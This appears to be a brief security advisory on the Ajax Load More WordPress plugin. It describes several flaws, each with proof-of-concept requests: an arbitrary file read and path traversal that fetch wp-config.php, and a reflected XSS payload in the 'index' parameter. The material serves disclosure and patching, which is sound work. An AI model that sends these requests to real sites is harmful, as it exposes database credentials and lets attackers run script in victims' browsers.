"ajax-load-more-repeaters" AJAX action is vulnerable to "Full Path Disclosure" since full path of webserver file name can be seen in the request. Arbitrary filename can be provided as input via parameter "alm_repeaters_export" to view the file contents. PoC for reading WordPress Configuration file:
POST /wp-admin/admin.php?page=ajax-load-more-repeaters
alm_repeaters_export=/var/www/html/wp-config.php
Vulnerable file: admin/admin.php
PoC:
/wp-admin/admin-ajax.php?action=alm_get_tax_terms&taxonomy=post_tag&index=1"><script>alert(1)</script>&nonce={nonce}
Parameter index is not properly sanitized.
Vulnerable file: admin/admin.php
PoC:
/wp-admin/admin-ajax.php?action=alm_get_layout&repeater=default&type=./../../../../wp-config.php&custom=true&alias=&nonce={nonce}
/wp-admin/admin-ajax.php?action=alm_get_layout&repeater=default&type=./../../wp-config&alias=&nonce={nonce}
Vulnerable file: admin/admin.php